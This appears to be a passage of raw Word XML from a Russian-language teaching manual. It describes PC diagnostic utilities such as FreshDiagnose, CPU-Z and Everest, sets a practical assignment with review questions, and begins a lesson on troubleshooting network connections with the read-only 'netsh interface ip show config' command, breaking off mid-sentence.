                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>freshdevices</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Утилита FreshDiagnose также покажет всю подноготную вашего компьютера. Собранные ею сведения будут полезны не только новичкам, но и опытным пользователям. Средства диагностики данной программы дополнены небольшим количеством специальных тестов для оценки уровня производительности анализируемой конфигурации.</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FreshDiagnose имеет интуитивно понятный интерфейс. Разделы Software System (Программная система) и Hardware System (Аппаратная система) позволяют получить максимально полную информацию об основных программных модулях, таких как операционная система, расширения файлов и ассоциированные с ними программы, системные папки и библиотеки, а также большое количество других дополнительных сведений. Раздел Hardware System (Аппаратная система) изобилует информацией о BIOS, материнской плате, процессоре, кэш-памяти и имеющихся портах. Раздел Devices (Устройства) представляет сведения обо всех внешних подключенных устройствах: приводах компакт-дисков и DVD, манипуляторах, принтерах и т.д. Если ваш компьютер подключен к локальной сети или Интернету, то, выбрав раздел Network and Internet (Локальная сеть и Интернет), вы узнаете об открытых сетевых ресурсах, настройках браузера Internet Explorer и параметрах доступа в Интернет. Кроме того, имеются разделы с информацией о различных мультимедиа-устройствах и аппаратных ресурсах. Такжне FreshDiagnose позволяет протестировать различные аппаратные компоненты компьютера, а также оценить их производительность, сравнив с аналогичными представителями других классов. Все результаты, и статистические, и практические, можно сохранить в виде отчета в файлах форматов DOC, TXT, RTF и HTML.</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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2220150" cy="1301231"/>
            <wp:effectExtent l="19050" t="0" r="8700" b="0"/>
            <wp:docPr id="2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23" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2220511" cy="1301442"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Рисунок 1. Стартовое окно FreshDiagnose.</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b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Cpu-Z. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CPU-Z – это бесплатная прикладная программа для отображения технической информации о персональном компьютере пользователя, работающая под ОС Microsoft Windows начиная с версии Windows 98 (включая Windows 8). Выпускается специальная версия под Android. В частности, программа определяет технические характеристики центрального процессора, видеокарты, материнской платы и оперативной памяти. Популярна среди оверклокеров. Программа позволяет получать следующие сведения:</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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1539784" cy="1749600"/>
            <wp:effectExtent l="19050" t="0" r="3266" b="0"/>
            <wp:docPr id="22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4" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1539642" cy="1749439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Рисунок 2. Главное окно Cpu-Z</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5. Everest. Everest – программа для просмотра информации об аппаратной и программной конфигурации компьютера, разработанная компанией Lavalys. Являлась последовательницей AIDA32, заменена на рынке программой AIDA64.</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xml:space="preserve">Возможности программы. Программа анализирует конфигурацию компьютера и выдает подробную информацию: - об установленных в системе устройствах – процессорах, системных платах, видеокартах, аудиокартах, модулях памяти и т.д.; - их характеристиках: тактовая частота, напряжение питания, размер кэшей, и т.д.; - поддерживаемых ими наборах команд и режимах работы; - их производителях; - установленном программном обеспечении; - конфигурации операционной системы; - установленных драйверах; - автоматически загружаемых программах; - запущенных процессах; - имеющихся лицензиях; - о температуре микропроцессора; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Тестирование производительности ПК</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чтение из памяти – тестирует скорость пересылки данных из ОЗУ к процессору</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запись в память – тестирует скорость пересылки данных из процессора к ОЗУ</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копирование в памяти – тестирует скорость пересылки данных из одних ячеек памяти в другие через кэш процессора</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задержка памяти – тестирует среднее время считывания процессором данных из ОЗУ</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xml:space="preserve">- CPU Queen – тестирует производительность процессора в целочисленных операциях при решении классической </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Задачи с ферзями</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>»</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CPU PhotoWorxx – тестирует производительность блоков целочисленных арифметических операций, умножения, а также подсистемы памяти при выполнении ряда стандартных операций с RGB-изображениями</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CPU ZLib – тестирует производительность процессора и подсистемы памяти при создании архивов формата ZIP при помощи популярной открытой библиотеки ZLib. Использует целочисленные операции.</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CPU AES – тестирует скорость процессора при выполнении шифрования по криптоалгоритму AES. Способен использовать низкоуровневые команды шифрования процессоров VIA C3 и C7, что позволяет последнему быть одним из лидеров теста, превосходя по производительности ряд многоядерных процессоров Intel и AMD.</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lastRenderedPageBreak/>
        <w:t>- FPU Julia – тестирует производительность блоков процессора, выполняющих операции с плавающей запятой, в вычислениях с 32-разрядной точностью. Моделирует несколько фрагментов фрактала Жюлиа. При возможности использует инструкции MMX, SSE и 3DNow!.</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FPU Mandel – тестирует производительность блоков процессора, выполняющих операции с плавающей запятой, в вычислениях с 64-разрядной точностью путем моделирования нескольких фрагментов фрактала Мандельброта. Способен использовать инструкции SSE2.</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FPU SinJulia – усложненный вариант теста FPU Julia. Тестирует производительность блоков процессора, выполняющих операции с плавающей запятой, в вычислениях с 80-разрядной точностью. Использует инструкции x87, предназначенные для вычисления тригонометрических и показательных функций.</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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2846550" cy="1311093"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="2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5" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2846305" cy="1310980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Рисунок 3. Головное окно Everest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Задание к практической части</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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Выполнить диагрностику</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> компьютер</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> средствами </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Sandra</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Belarc</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Advisor</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>FreshDiagnose</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</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2. Составьте отчет со скриншотами, в котором опишите особенности утилит (ваше мнение).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Контрольные вопросы:</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1. Как же узнать, какие именно аппаратные решения используются в вашем компьютере?</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2. Кому пригодится статистика по данным компьютера?</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3. Какие средства для тестирования компьютера вы знаете?</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4. Какими могут быть программы для тестирования компьютера</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> по назначению</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>5. Какую программу вы выделили бы особо, и по каким критериям?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="0094432D">
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc507788530"/>
      <w:bookmarkStart w:id="109" w:name="_Toc507788255"/>
      <w:bookmarkStart w:id="110" w:name="_Toc26278728"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № 9 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выявление и решение проблем входа в систему при использовании программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков выявления и решения проблем разрешения имен при использовании программного обеспечения отраслевой направленности. Выявление и устранение проблем сетевых подключений: использование командной строки для выявления и устранения проблем сетевых подключений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, программное обеспечение; ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Выявление и решение проблем разрешения имен при использовании программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Согласно инструкции из теоретической части провести подключение виртуальной системы на базе VirtualBox к домену виртуальной сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся скриншоты этапов выполнения работы и комментарии к ним.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Согласно инструкции из теоретической части провести подключение виртуальной системы на базе VirtualBox к домену виртуальной сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка параметров сетевого адаптера из командной строки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Подключая ноутбук к разным сетям, иногда сталкиваешься с настройкой параметров сетевого адаптера под конкретную сеть, поскольку не все провайдеры и администраторы обеспечиваются настройку по DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Есть n-ное количество программ, например, NetSetMan, которые позволяют используя графический интерфейс выбирать профили настроек и применять их. Ошибки в таких программах при работе в Windows 7, а также другие причины заставляют отказаться от них в пользу командных файлов. Поэтому опишу несколько типовых командных файлов для смены настроек сетевого адаптера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимание! Следует помнить, что действия по изменению параметров сетевого адаптера должны выполняться от имени пользователя с правами администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Посмотреть список всех сетевых адаптеров, можно используя команду </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netsh interface ip show config</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</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C:\Windows\System32&gt;netsh interface ip show config Настройка интерфейса </w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Беспроводное сетевое соединение</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> DHCP включен: Да IP-адрес 192.168.1.105 Префикс подсети: 192.168.1.0/24 (маска 255.255.255.0) Основной шлюз: 192.168.1.1 Метрика шлюза: 0 Метрика интерфейса: 25 DNS-серверы с настройкой через DHCP: 109.230.128.138 192.168.1.1 Зарегистрировать с суффиксом: Только основной WINS-серверы с настройкой через DHCP: Нет Настройка интерфейса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 включен: Да IP-адрес 192.168.1.101 Префикс подсети: 192.168.1.0/24 (маска 255.255.255.0) Основной шлюз: 192.168.1.1 Метрика шлюза: 0 Метрика интерфейса: 20 DNS-серверы с настройкой через DHCP: 109.230.128.138 192.168.1.1 Зарегистрировать с суффиксом: Только основной WINS-серверы с настройкой через DHCP: Нет</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Самое важное в данной команде это то, как называются наши сетевые адаптеры, параметры которых мы хотим изменить. В данном случае мы имеет два адаптера с именами </w:t>
      </w:r>
